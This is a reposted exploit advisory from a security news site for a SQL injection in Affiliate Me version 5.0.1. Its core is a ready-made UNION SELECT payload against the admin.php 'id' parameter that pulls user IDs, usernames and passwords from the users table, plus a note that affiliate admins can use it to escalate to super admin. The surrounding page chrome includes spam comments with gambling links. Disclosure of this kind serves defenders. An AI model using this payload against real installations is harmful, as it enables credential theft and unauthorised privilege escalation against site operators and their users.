Exploit/Advisories

Published on May 23rd, 2023 📆 | 4888 Views ⚑

0

Affiliate Me 5.0.1 SQL Injection – Torchsec

https://www.ispeech.org

[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: [email protected]
[#] Blog: https://www.0wl.tech
[#] 3xploit:
[path]/admin.php?show=reply&id=[Injected Query]
[#] 3xample:











[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
[#] Notes:
- Affiliate admin can exploit this vulnerability to escalate his privileges to super admin.

Tagged with: 5.0.1 • affiliate • injection • SQL • torchsec

Leave a Reply Cancel reply

🌟 Your Account

Username/Email Password
Remember Me
Register
🔔 Email Subscriptions

Get new posts by email
- Donate Via Wallets
  MetaMask
  
  Trust Wallet
  
  Binance Wallet
  
  WalletConnect
Popular
- Get a SmartThings Station for $1, save 98% now May 16, 2023 — Recommendations are independently chosen by Reviewed’s editors. Purchases you…
- The True Cost of a Free Telly TV May 21, 2023 There’s no such thing as a free lunch. Nor is…
- Red Hat Security Advisory 2023-0584-01 – Torchsec May 20, 2023 -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================Red Hat Security AdvisorySynopsis: Moderate: Secondary…
- Sony A95K vs Samsung S95C: Which should you buy? May 13, 2023 This year marks the second generation of QD-OLED, a new…
- Apple AirPods Pro 2 vs Beats Fit Pro May 11, 2023 Even though they’ve been out since 2021, the Beats Fit…
Gloss
- link slot online on Apple Security Advisory 2023-05-03-1 – Torchsec
- philippines bingo app live online on Apple Security Advisory 2023-05-03-1 – Torchsec
- nba Games odds today philippines on Apple Security Advisory 2023-05-03-1 – Torchsec
- Website on Apple Security Advisory 2023-05-03-1 – Torchsec
- online live bingo app philippines bingoplus on Apple Security Advisory 2023-05-03-1 – Torchsec
- arena plus nba injury report ph on Apple Security Advisory 2023-05-03-1 – Torchsec
- vikiofb on Investing in AI: how to avoid the hype
- vikierm on SitemagicCMS 4.4.3 Shell Upload – Torchsec
- playoffs on Apple Security Advisory 2023-05-03-1 – Torchsec
- bingoplus philippines online bingo app on Apple Security Advisory 2023-05-03-1 – Torchsec
Feed
- Your trial feed URL has expired June 9, 2023
  Please create a new one for free or upgrade your subscription plan to get a persistent URL at MySitemapGenerator.com
  MySitemapGenerator
☕️Social Media

Torchsec

Tweets by Torch_sec
👥Members

Newest | Active | Popular
- Anna Shipman
  
  registered 17 hours, 2 minutes ago
- venomlightingllc
  
  registered 1 day, 5 hours ago
- fleurdebreezehvac
  
  registered 1 day, 5 hours ago
- swankycelebs02
  
  registered 3 days, 16 hours ago
- Janessa Sadler
  
  registered 4 days, 12 hours ago
🌍 Forum Groups

Newest | Active | Popular | Alphabetical
- Programming & coding
  
  active 17 hours, 2 minutes ago
- General Talk
  
  active 17 hours, 2 minutes ago
- Help Me !!
  
  active 17 hours, 2 minutes ago
- Comments & Suggestions
  
  active 17 hours, 2 minutes ago
- Ebooks – Papers
  
  active 17 hours, 2 minutes ago

We share and comment on interesting infosec related news, tools and more. Follow us on RSS ,Facebook or Twitter for the latest updates. Torchsec is designed to help Auditors, Pentesters & Security Experts to keep their ethical hacking oriented toolbox up-to-date .
This website is made for educational and ethical testing purposes only。It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this website.

Archives

© Torchsec Privacy Policy Disclaimer T&C

Back to Top ↑